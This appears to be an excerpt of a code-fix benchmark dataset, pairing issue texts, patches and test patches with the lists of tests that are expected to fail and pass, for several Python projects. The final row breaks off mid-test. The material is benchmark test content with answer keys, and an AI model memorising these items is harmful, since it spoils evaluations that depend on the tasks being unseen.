|
abd0cf90d665f0b709ecccefe4b6187d14d60ffa
|
diff --git a/tests/test_password_hasher.py b/tests/test_password_hasher.py
index d6fa626..17f9410 100644
--- a/tests/test_password_hasher.py
+++ b/tests/test_password_hasher.py
@@ -109,22 +109,32 @@ class TestPasswordHasher:
with pytest.raises(InvalidHash):
PasswordHasher().verify("tiger", "does not matter")
- def test_check_needs_rehash_no(self):
+ @pytest.mark.parametrize("use_bytes", [True, False])
+ def test_check_needs_rehash_no(self, use_bytes):
"""
Return False if the hash has the correct parameters.
"""
ph = PasswordHasher(1, 8, 1, 16, 16)
- assert not ph.check_needs_rehash(ph.hash("foo"))
+ hash = ph.hash("foo")
+ if use_bytes:
+ hash = hash.encode()
- def test_check_needs_rehash_yes(self):
+ assert not ph.check_needs_rehash(hash)
+
+ @pytest.mark.parametrize("use_bytes", [True, False])
+ def test_check_needs_rehash_yes(self, use_bytes):
"""
Return True if any of the parameters changes.
"""
ph = PasswordHasher(1, 8, 1, 16, 16)
ph_old = PasswordHasher(1, 8, 1, 8, 8)
- assert ph.check_needs_rehash(ph_old.hash("foo"))
+ hash = ph_old.hash("foo")
+ if use_bytes:
+ hash = hash.encode()
+
+ assert ph.check_needs_rehash(hash)
def test_type_is_configurable(self):
"""
|
Make PasswordHasher.check_needs_rehash() accept bytes hash
`PasswordHasher.check_needs_rehash()` should also accept bytes hashes to be consistent with the rest of the API.
|
0.0
|
abd0cf90d665f0b709ecccefe4b6187d14d60ffa
|
[
"tests/test_password_hasher.py::TestPasswordHasher::test_check_needs_rehash_no[True]",
"tests/test_password_hasher.py::TestPasswordHasher::test_check_needs_rehash_yes[True]"
] |
[
"tests/test_password_hasher.py::TestEnsureBytes::test_is_bytes",
"tests/test_password_hasher.py::TestEnsureBytes::test_is_str",
"tests/test_password_hasher.py::TestPasswordHasher::test_hash[p\\xe4ssword0]",
"tests/test_password_hasher.py::TestPasswordHasher::test_hash[p\\xe4ssword1]",
"tests/test_password_hasher.py::TestPasswordHasher::test_custom_salt",
"tests/test_password_hasher.py::TestPasswordHasher::test_verify_agility[p\\xe4ssword0]",
"tests/test_password_hasher.py::TestPasswordHasher::test_verify_agility[p\\xe4ssword1]",
"tests/test_password_hasher.py::TestPasswordHasher::test_hash_verify[p\\xe4ssword0]",
"tests/test_password_hasher.py::TestPasswordHasher::test_hash_verify[p\\xe4ssword1]",
"tests/test_password_hasher.py::TestPasswordHasher::test_check",
"tests/test_password_hasher.py::TestPasswordHasher::test_verify_invalid_hash_error",
"tests/test_password_hasher.py::TestPasswordHasher::test_verify_invalid_hash",
"tests/test_password_hasher.py::TestPasswordHasher::test_check_needs_rehash_no[False]",
"tests/test_password_hasher.py::TestPasswordHasher::test_check_needs_rehash_yes[False]",
"tests/test_password_hasher.py::TestPasswordHasher::test_type_is_configurable"
] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2024-04-16 06:36:03+00:00
|
mit
| 2,768
|
|
unit8co__darts-1435
|
diff --git a/darts/timeseries.py b/darts/timeseries.py
index fc757f58..b629aa4f 100644
--- a/darts/timeseries.py
+++ b/darts/timeseries.py
@@ -2604,10 +2604,6 @@ class TimeSeries:
attrs=self._xa.attrs,
)
- # new_xa = xr.concat(objs=[self._xa, other_xa], dim=str(self._time_dim))
- if not self._has_datetime_index:
- new_xa = new_xa.reset_index(dims_or_levels=new_xa.dims[0])
-
return self.__class__.from_xarray(
new_xa, fill_missing_dates=True, freq=self._freq_str
)
@@ -2626,7 +2622,6 @@ class TimeSeries:
TimeSeries
A new TimeSeries with the new values appended
"""
-
if self._has_datetime_index:
idx = pd.DatetimeIndex(
[self.end_time() + i * self._freq for i in range(1, len(values) + 1)],
@@ -2634,9 +2629,10 @@ class TimeSeries:
)
else:
idx = pd.RangeIndex(
- len(self), len(self) + self.freq * len(values), step=self.freq
+ start=self.end_time() + self._freq,
+ stop=self.end_time() + (len(values) + 1) * self._freq,
+ step=self._freq,
)
-
return self.append(
self.__class__.from_times_and_values(
values=values,
|
unit8co/darts
|
9a40ca61ad34a7087bcfb27b01f0ea845a9fa4ae
|
diff --git a/darts/tests/test_timeseries.py b/darts/tests/test_timeseries.py
index c4414a13..61688bd2 100644
--- a/darts/tests/test_timeseries.py
+++ b/darts/tests/test_timeseries.py
@@ -621,15 +621,53 @@ class TimeSeriesTestCase(DartsBaseTestClass):
def test_append(self):
TimeSeriesTestCase.helper_test_append(self, self.series1)
+ # Check `append` deals with `RangeIndex` series correctly:
+ series_1 = linear_timeseries(start=1, length=5, freq=2)
+ series_2 = linear_timeseries(start=11, length=2, freq=2)
+ appended = series_1.append(series_2)
+ expected_vals = np.concatenate(
+ [series_1.all_values(), series_2.all_values()], axis=0
+ )
+ expected_idx = pd.RangeIndex(start=1, stop=15, step=2)
+ self.assertTrue(np.allclose(appended.all_values(), expected_vals))
+ self.assertTrue(appended.time_index.equals(expected_idx))
def test_append_values(self):
TimeSeriesTestCase.helper_test_append_values(self, self.series1)
+ # Check `append_values` deals with `RangeIndex` series correctly:
+ series = linear_timeseries(start=1, length=5, freq=2)
+ appended = series.append_values(np.ones((2, 1, 1)))
+ expected_vals = np.concatenate(
+ [series.all_values(), np.ones((2, 1, 1))], axis=0
+ )
+ expected_idx = pd.RangeIndex(start=1, stop=15, step=2)
+ self.assertTrue(np.allclose(appended.all_values(), expected_vals))
+ self.assertTrue(appended.time_index.equals(expected_idx))
def test_prepend(self):
TimeSeriesTestCase.helper_test_prepend(self, self.series1)
+ # Check `prepend` deals with `RangeIndex` series correctly:
+ series_1 = linear_timeseries(start=1, length=5, freq=2)
+ series_2 = linear_timeseries(start=11, length=2, freq=2)
+ prepended = series_2.prepend(series_1)
+ expected_vals = np.concatenate(
+ [series_1.all_values(), series_2.all_values()], axis=0
+ )
+ expected_idx = pd.RangeIndex(start=1, stop=15, step=2)
+ self.assertTrue(np.allclose(prepended.all_values(), expected_vals))
+ self.assertTrue(prepended.time_index.equals(expected_idx))
def test_prepend_values(self):
TimeSeriesTestCase.helper_test_prepend_values(self, self.series1)
+ # Check `prepend_values` deals with `RangeIndex` series correctly:
+ series = linear_timeseries(start=1, length=5, freq=2)
+ prepended = series.prepend_values(np.ones((2, 1, 1)))
+ expected_vals = np.concatenate(
+ [np.ones((2, 1, 1)), series.all_values()], axis=0
+ )
+ expected_idx = pd.RangeIndex(start=-3, stop=11, step=2)
+ self.assertTrue(np.allclose(prepended.all_values(), expected_vals))
+ self.assertTrue(prepended.time_index.equals(expected_idx))
def test_with_values(self):
vals = np.random.rand(5, 10, 3)
|
[BUG] `append_values` incorrectly extends `time_index` of `pd.RangeIndex`-typed `TimeSeries`
**Describe the bug**
When `append_values` is used to add new values to a `pd.RangeIndex`-typed `TimeSeries` , the `time_index` of the entire series is 'reset' so that each value is labeled with its index position. This is particularly unexpected if the `TimeSeries` in question does not have a frequency of `1` and/or does not start with a `time_index` of `0`.
**To Reproduce**
Consider the following example:
```python
from darts.utils.timeseries_generation import linear_timeseries
import numpy as np
series = linear_timeseries(start=1, length=5, freq=2)
print('Before `append_values`:')
print(list(series.time_index))
new_values = np.ones((1,))
print('After `append_values`:')
print(list(series.append_values(new_values).time_index))
```
This yields:
```
Before `append_values`:
[1, 3, 5, 7, 9]
After `append_values`:
[0, 1, 2, 3, 4, 5]
```
Notice how the `time_index` now starts at `0` instead of `1` **and** has a frequency of `1` instead of `2`.
**Expected behavior**
Instead of resetting the `time_index` of `pd.RangeIndex`-typed `TimeSeries`, `append_values` should 'extend' the `time_index`. More explicitly, for the previous example, one should expect the output:
```
Before `append_values`:
[1, 3, 5, 7, 9]
After `append_values`:
[1, 3, 5, 7, 9, 11]
```
Indeed, this is the [behaviour that's advertised by `append_values`' docstring](https://unit8co.github.io/darts/generated_api/darts.timeseries.html#darts.timeseries.TimeSeries.append_values) and, additionally, is how it behaves when dealing with `pd.DatetimeIndex`-typed `TimeSeries`. To see this, consider the following example:
```python
from darts.utils.timeseries_generation import linear_timeseries
import numpy as np
import pandas as pd
series = linear_timeseries(start=pd.Timestamp('1/1/2000'), length=2, freq='2d')
print('Before `append_values`:')
print(list(series.time_index))
new_values = np.ones((1,))
print('After `append_values`:')
print(list(series.append_values(new_values).time_index))
```
This prints:
```
Before `append_values`:
[Timestamp('2000-01-01 00:00:00', freq='2D'), Timestamp('2000-01-03 00:00:00', freq='2D')]
After `append_values`:
[Timestamp('2000-01-01 00:00:00', freq='2D'), Timestamp('2000-01-03 00:00:00', freq='2D'), Timestamp('2000-01-05 00:00:00', freq='2D')]
```
Notice how the `append_values` has simply added the date `2000-01-05` to the `time_index` of `series`.
In cases where the user really wants 'reset' the `time_index` of a `TimeSeries` after appending values, this should probably be achieved by implementing a separate `TimeSeries.reset_index()` method.
**System (please complete the following information):**
- Python version: 3.10.6
- darts version: 0.22.0
**Additional context**
N/A
|
0.0
|
9a40ca61ad34a7087bcfb27b01f0ea845a9fa4ae
|
[
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_append",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_append_values",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_prepend",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_prepend_values"
] |
[
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_alt_creation",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_column_names",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_creation",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_dates",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_diff",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_drop",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_eq",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_fill_missing_dates",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_fillna_value",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_from_csv",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_gaps",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_getitem",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_index_creation",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_integer_indexing",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_intersect",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_longest_contiguous_slice",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_map",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_map_with_timestamp",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_map_wrong_fn",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_ops",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_quantiles",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_quantiles_df",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_rescale",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_shift",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_short_series_slice",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_slice",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_split",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_to_csv_deterministic",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_to_csv_probabilistic_ts",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_to_csv_stochastic",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_univariate_component",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_with_columns_renamed",
"darts/tests/test_timeseries.py::TimeSeriesTestCase::test_with_values",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_component_different_time_axes_no_force",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_component_different_time_axes_with_force",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_component_different_time_axes_with_force_uneven_series",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_component_sunny_day",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_sample_sunny_day",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_time_different_time_axes_force",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_time_different_time_axes_no_force",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_time_different_time_axes_no_force_2_day_freq",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_time_same_time_force",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_time_same_time_no_force",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_time_sunny_day",
"darts/tests/test_timeseries.py::TimeSeriesConcatenateTestCase::test_concatenate_timeseries_method",
"darts/tests/test_timeseries.py::TimeSeriesHierarchyTestCase::test_concat",
"darts/tests/test_timeseries.py::TimeSeriesHierarchyTestCase::test_creation_with_hierarchy_sunny_day",
"darts/tests/test_timeseries.py::TimeSeriesHierarchyTestCase::test_hierarchy_processing",
"darts/tests/test_timeseries.py::TimeSeriesHierarchyTestCase::test_ops",
"darts/tests/test_timeseries.py::TimeSeriesHierarchyTestCase::test_with_hierarchy_rainy_day",
"darts/tests/test_timeseries.py::TimeSeriesHierarchyTestCase::test_with_hierarchy_sunny_day",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_numeric_time_index",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_overshot_component_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_overshot_sample_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_overshot_time_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_sunny_day_component_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_sunny_day_sample_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_head_sunny_day_time_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_tail_numeric_time_index",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_tail_overshot_component_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_tail_overshot_sample_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_tail_overshot_time_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_tail_sunny_day_component_axis",
"darts/tests/test_timeseries.py::TimeSeriesHeadTailTestCase::test_tail_sunny_day_time_axis",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_fail_with_bad_integer_time_col",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_from_dataframe_sunny_day",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_convert_datetime",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_convert_datetime_strings",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_convert_garbage",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_convert_integers",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_convert_rangeindex",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_convert_string_integers",
"darts/tests/test_timeseries.py::TimeSeriesFromDataFrameTestCase::test_time_col_with_tz",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_kurtosis",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_max",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_mean",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_median",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_min",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_quantile",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_skew",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_std",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_sum",
"darts/tests/test_timeseries.py::SimpleStatisticsTestCase::test_var"
] |
{
"failed_lite_validators": [
"has_hyperlinks"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-12-18 03:42:10+00:00
|
apache-2.0
| 6,165
|
|
scikit-build__scikit-build-105
|
diff --git a/skbuild/cmaker.py b/skbuild/cmaker.py
index 9030c1e..2c7d7f5 100644
--- a/skbuild/cmaker.py
+++ b/skbuild/cmaker.py
@@ -9,6 +9,8 @@ import shlex
import sys
import sysconfig
+from subprocess import CalledProcessError
+
from .platform_specifics import get_platform
from .exceptions import SKBuildError
@@ -62,10 +64,11 @@ def _touch_init(folder):
class CMaker(object):
def __init__(self, **defines):
- if platform.system() != 'Windows':
- rtn = subprocess.call(['which', 'cmake'])
- if rtn != 0:
- sys.exit('CMake is not installed, aborting build.')
+ # verify that CMake is installed
+ try:
+ subprocess.check_call(['cmake', '--version'])
+ except (OSError, CalledProcessError):
+ raise SKBuildError('CMake is not installed, aborting build.')
self.platform = get_platform()
@@ -93,8 +96,9 @@ class CMaker(object):
generator_id = self.platform.get_best_generator(generator_id)
if generator_id is None:
- sys.exit("Could not get working generator for your system."
- " Aborting build.")
+ raise SKBuildError(
+ "Could not get working generator for your system."
+ " Aborting build.")
if not os.path.exists(CMAKE_BUILD_DIR):
os.makedirs(CMAKE_BUILD_DIR)
@@ -137,11 +141,20 @@ class CMaker(object):
# changes dir to cmake_build and calls cmake's configure step
# to generate makefile
- rtn = subprocess.check_call(cmd, cwd=CMAKE_BUILD_DIR)
+ rtn = subprocess.call(cmd, cwd=CMAKE_BUILD_DIR)
if rtn != 0:
- raise RuntimeError("Could not successfully configure "
- "your project. Please see CMake's "
- "output for more information.")
+ raise SKBuildError(
+ "An error occurred while configuring with CMake.\n"
+ " Command:\n"
+ " {}\n"
+ " Source directory:\n"
+ " {}\n"
+ " Working directory:\n"
+ " {}\n"
+ "Please see CMake's output for more information.".format(
+ self._formatArgsForDisplay(cmd),
+ os.path.abspath(cwd),
+ os.path.abspath(CMAKE_BUILD_DIR)))
CMaker.check_for_bad_installs()
@@ -335,7 +348,6 @@ class CMaker(object):
if bad_installs:
raise SKBuildError("\n".join((
- "",
" CMake-installed files must be within the project root.",
" Project Root:",
" " + install_dir,
@@ -349,7 +361,7 @@ class CMaker(object):
"""
clargs, config = pop_arg('--config', clargs, config)
if not os.path.exists(CMAKE_BUILD_DIR):
- raise RuntimeError(("CMake build folder ({}) does not exist. "
+ raise SKBuildError(("CMake build folder ({}) does not exist. "
"Did you forget to run configure before "
"make?").format(CMAKE_BUILD_DIR))
@@ -361,8 +373,20 @@ class CMaker(object):
shlex.split(os.environ.get("SKBUILD_BUILD_OPTIONS", "")))
)
- rtn = subprocess.check_call(cmd, cwd=CMAKE_BUILD_DIR)
- return rtn
+ rtn = subprocess.call(cmd, cwd=CMAKE_BUILD_DIR)
+ if rtn != 0:
+ raise SKBuildError(
+ "An error occurred while building with CMake.\n"
+ " Command:\n"
+ " {}\n"
+ " Source directory:\n"
+ " {}\n"
+ " Working directory:\n"
+ " {}\n"
+ "Please see CMake's output for more information.".format(
+ self._formatArgsForDisplay(cmd),
+ os.path.abspath(source_dir),
+ os.path.abspath(CMAKE_BUILD_DIR)))
def install(self):
"""Returns a list of tuples of (install location, file list) to install
@@ -377,3 +401,14 @@ class CMaker(object):
return [_remove_cwd_prefix(path) for path in manifest]
return []
+
+ @staticmethod
+ def _formatArgsForDisplay(args):
+ """Format a list of arguments appropriately for display. When formatting
+ a command and its arguments, the user should be able to execute the
+ command by copying and pasting the output directly into a shell.
+
+ Currently, the only formatting is naively surrounding each argument with
+ quotation marks.
+ """
+ return ' '.join("\"{}\"".format(arg) for arg in args)
diff --git a/skbuild/exceptions.py b/skbuild/exceptions.py
index 4a0e074..2b8f8b1 100644
--- a/skbuild/exceptions.py
+++ b/skbuild/exceptions.py
@@ -1,3 +1,6 @@
-class SKBuildError(Exception):
+class SKBuildError(RuntimeError):
+ """Exception raised when an error occurs while configuring or building a
+ project.
+ """
pass
diff --git a/skbuild/setuptools_wrap.py b/skbuild/setuptools_wrap.py
index 0fbd86f..54efdb3 100644
--- a/skbuild/setuptools_wrap.py
+++ b/skbuild/setuptools_wrap.py
@@ -131,12 +131,56 @@ def setup(*args, **kw):
reverse=True
))
- cmkr = cmaker.CMaker()
- cmkr.configure(cmake_args)
- cmkr.make(make_args)
+ try:
+ cmkr = cmaker.CMaker()
+ cmkr.configure(cmake_args)
+ cmkr.make(make_args)
+ except SKBuildError as e:
+ import traceback
+ print("Traceback (most recent call last):")
+ traceback.print_tb(sys.exc_info()[2])
+ print()
+ sys.exit(e)
+
+ _classify_files(cmkr.install(), package_data, package_prefixes, py_modules,
+ scripts, new_scripts, data_files)
+
+ kw['package_data'] = package_data
+ kw['package_dir'] = {
+ package: os.path.join(cmaker.CMAKE_INSTALL_DIR, prefix)
+ for prefix, package in package_prefixes
+ }
+
+ kw['py_modules'] = py_modules
+
+ kw['scripts'] = [
+ os.path.join(cmaker.CMAKE_INSTALL_DIR, script) if mask else script
+ for script, mask in new_scripts.items()
+ ]
+
+ kw['data_files'] = [
+ (parent_dir, list(file_set))
+ for parent_dir, file_set in data_files.items()
+ ]
+
+ # work around https://bugs.python.org/issue1011113
+ # (patches provided, but no updates since 2014)
+ cmdclass = kw.get('cmdclass', {})
+ cmdclass['build'] = cmdclass.get('build', build.build)
+ cmdclass['install'] = cmdclass.get('install', install.install)
+ cmdclass['clean'] = cmdclass.get('clean', clean.clean)
+ cmdclass['bdist'] = cmdclass.get('bdist', bdist.bdist)
+ cmdclass['bdist_wheel'] = cmdclass.get(
+ 'bdist_wheel', bdist_wheel.bdist_wheel)
+ kw['cmdclass'] = cmdclass
+
+ return upstream_setup(*args, **kw)
+
+def _classify_files(install_paths, package_data, package_prefixes, py_modules,
+ scripts, new_scripts, data_files):
install_root = os.path.join(os.getcwd(), cmaker.CMAKE_INSTALL_DIR)
- for path in cmkr.install():
+ for path in install_paths:
found_package = False
found_module = False
found_script = False
@@ -204,34 +248,3 @@ def setup(*args, **kw):
data_files[parent_dir] = file_set
file_set.add(os.path.join(cmaker.CMAKE_INSTALL_DIR, path))
del parent_dir, file_set
-
- kw['package_data'] = package_data
- kw['package_dir'] = {
- package: os.path.join(cmaker.CMAKE_INSTALL_DIR, prefix)
- for prefix, package in package_prefixes
- }
-
- kw['py_modules'] = py_modules
-
- kw['scripts'] = [
- os.path.join(cmaker.CMAKE_INSTALL_DIR, script) if mask else script
- for script, mask in new_scripts.items()
- ]
-
- kw['data_files'] = [
- (parent_dir, list(file_set))
- for parent_dir, file_set in data_files.items()
- ]
-
- # work around https://bugs.python.org/issue1011113
- # (patches provided, but no updates since 2014)
- cmdclass = kw.get('cmdclass', {})
- cmdclass['build'] = cmdclass.get('build', build.build)
- cmdclass['install'] = cmdclass.get('install', install.install)
- cmdclass['clean'] = cmdclass.get('clean', clean.clean)
- cmdclass['bdist'] = cmdclass.get('bdist', bdist.bdist)
- cmdclass['bdist_wheel'] = cmdclass.get(
- 'bdist_wheel', bdist_wheel.bdist_wheel)
- kw['cmdclass'] = cmdclass
-
- return upstream_setup(*args, **kw)
|
scikit-build/scikit-build
|
abaaeee43e0456ef9da7d4878f0310c569bd6525
|
diff --git a/tests/test_outside_project_root.py b/tests/test_outside_project_root.py
index 9500a4d..d67baa4 100644
--- a/tests/test_outside_project_root.py
+++ b/tests/test_outside_project_root.py
@@ -5,7 +5,8 @@
----------------------------------
Tries to build the `fail-outside-project-root` sample project. Ensures that the
-attempt fails with an SKBuildError exception.
+attempt fails with a SystemExit exception that has an SKBuildError exception as
+its value.
"""
from skbuild.exceptions import SKBuildError
@@ -23,10 +24,10 @@ def test_outside_project_root_fails():
def should_fail():
pass
- exception_thrown = False
+ failed = False
try:
should_fail()
- except SKBuildError:
- exception_thrown = True
+ except SystemExit as e:
+ failed = isinstance(e.code, SKBuildError)
- assert exception_thrown
+ assert failed
|
Improve cmaker exception
When there is a problem building python module, report "human-friendly" error
|
0.0
|
abaaeee43e0456ef9da7d4878f0310c569bd6525
|
[
"tests/test_outside_project_root.py::test_outside_project_root_fails"
] |
[] |
{
"failed_lite_validators": [
"has_short_problem_statement",
"has_many_modified_files",
"has_many_hunks"
],
"has_test_patch": true,
"is_lite": false
}
|
2016-07-22 19:35:31+00:00
|
mit
| 5,355
|
|
pythonprofilers__memory_profiler-280
|
diff --git a/README.rst b/README.rst
index b52b6f2..79d1c6b 100644
--- a/README.rst
+++ b/README.rst
@@ -64,14 +64,14 @@ this would result in::
Output will follow::
- Line # Mem usage Increment Line Contents
- ==============================================
- 3 @profile
- 4 5.97 MB 0.00 MB def my_func():
- 5 13.61 MB 7.64 MB a = [1] * (10 ** 6)
- 6 166.20 MB 152.59 MB b = [2] * (2 * 10 ** 7)
- 7 13.61 MB -152.59 MB del b
- 8 13.61 MB 0.00 MB return a
+ Line # Mem usage Increment Occurences Line Contents
+ ============================================================
+ 3 38.816 MiB 38.816 MiB 1 @profile
+ 4 def my_func():
+ 5 46.492 MiB 7.676 MiB 1 a = [1] * (10 ** 6)
+ 6 199.117 MiB 152.625 MiB 1 b = [2] * (2 * 10 ** 7)
+ 7 46.629 MiB -152.488 MiB 1 del b
+ 8 46.629 MiB 0.000 MiB 1 return a
The first column represents the line number of the code that has been
diff --git a/memory_profiler.py b/memory_profiler.py
index cd4ba4f..632bee3 100644
--- a/memory_profiler.py
+++ b/memory_profiler.py
@@ -280,10 +280,10 @@ def memory_usage(proc=-1, interval=.1, timeout=None, timestamps=False,
to this file instead of stored in memory and returned at the end of
the subprocess. Useful for long-running processes.
Implies timestamps=True.
-
+
max_iterations : int
Limits the number of iterations (calls to the process being monitored). Relevent
- when the process is a python function.
+ when the process is a python function.
Returns
-------
@@ -357,7 +357,7 @@ def memory_usage(proc=-1, interval=.1, timeout=None, timestamps=False,
raise
p.join(5 * interval)
-
+
if (n_measurements > 4) or (current_iter == max_iter) or (interval < 1e-6):
break
interval /= 10.
@@ -643,7 +643,12 @@ class CodeMap(dict):
prev_line_value = self[code].get(prev_lineno, None) if prev_lineno else None
prev_line_memory = prev_line_value[1] if prev_line_value else 0
- self[code][lineno] = (max(previous_inc, memory-prev_line_memory), max(memory, previous_memory))
+ occ_count = self[code][lineno][2] + 1 if lineno in self[code] else 1
+ self[code][lineno] = (
+ previous_inc + (memory - prev_line_memory),
+ max(memory, previous_memory),
+ occ_count,
+ )
def items(self):
"""Iterate on the toplevel code blocks."""
@@ -800,10 +805,10 @@ class LineProfiler(object):
def show_results(prof, stream=None, precision=1):
if stream is None:
stream = sys.stdout
- template = '{0:>6} {1:>12} {2:>12} {3:<}'
+ template = '{0:>6} {1:>12} {2:>12} {3:>10} {4:<}'
for (filename, lines) in prof.code_map.items():
- header = template.format('Line #', 'Mem usage', 'Increment',
+ header = template.format('Line #', 'Mem usage', 'Increment', 'Occurences',
'Line Contents')
stream.write(u'Filename: ' + filename + '\n\n')
@@ -817,13 +822,15 @@ def show_results(prof, stream=None, precision=1):
for (lineno, mem) in lines:
if mem:
inc = mem[0]
- mem = mem[1]
- mem = template_mem.format(mem)
+ total_mem = mem[1]
+ total_mem = template_mem.format(total_mem)
+ occurences = mem[2]
inc = template_mem.format(inc)
else:
- mem = u''
+ total_mem = u''
inc = u''
- tmp = template.format(lineno, mem, inc, all_lines[lineno - 1])
+ occurences = u''
+ tmp = template.format(lineno, total_mem, inc, occurences, all_lines[lineno - 1])
stream.write(to_str(tmp))
stream.write(u'\n\n')
|
pythonprofilers/memory_profiler
|
8a8a40252cccc09dc469445596742dc6b47ed6e3
|
diff --git a/test/test_increment_display.py b/test/test_increment_display.py
new file mode 100644
index 0000000..b0dbe51
--- /dev/null
+++ b/test/test_increment_display.py
@@ -0,0 +1,81 @@
+import unittest
+
+from memory_profiler import LineProfiler, profile, show_results
+from io import StringIO
+
+
+class TestIncrementDisplay(unittest.TestCase):
+ """Tests memory incrementation / decrementation display"""
+
+ def test_loop_count(self):
+
+ def some_loop():
+ for i in range(12): # line -2
+ a = 1 # line -1
+
+ profiler = LineProfiler()
+ wrapped = profiler(some_loop)
+ wrapped()
+ show_results(profiler)
+ for_line = list(list(profiler.code_map.values())[0].values())[-2]
+ looped_instruction = list(list(profiler.code_map.values())[0].values())[-1]
+
+ self.assertEqual(for_line[2], 13)
+ self.assertEqual(looped_instruction[2], 12)
+
+ def test_normal_incr(self):
+
+ def normal_incr():
+ use_some_memory = [1] * (10 ** 6)
+
+ profiler = LineProfiler()
+ wrapped = profiler(normal_incr)
+ wrapped()
+
+ show_results(profiler)
+ results = list(list(profiler.code_map.values())[0].values())[-1]
+
+ self.assertGreater(results[0], 0)
+ self.assertGreater(results[1], results[0])
+ self.assertEqual(results[2], 1)
+
+ def test_loop_incr(self):
+
+ def loop_incr():
+ a = []
+ b = [2] * (2 * 10 ** 7) # line -4
+ for i in range(3):
+ c = [2] * (2 * 10 ** 7) # line -2
+ a.append(c)
+
+ profiler = LineProfiler()
+ wrapped = profiler(loop_incr)
+ wrapped()
+
+ show_results(profiler)
+ b_line = list(list(profiler.code_map.values())[0].values())[-4]
+ c_line = list(list(profiler.code_map.values())[0].values())[-2]
+ self.assertAlmostEqual(b_line[2] * 3, c_line[2], delta=1)
+ self.assertEqual(c_line[2], 3)
+
+ def test_decr(self):
+
+ def del_stuff():
+ b = [2] * (2 * 10 ** 7)
+ del b
+
+ profiler = LineProfiler()
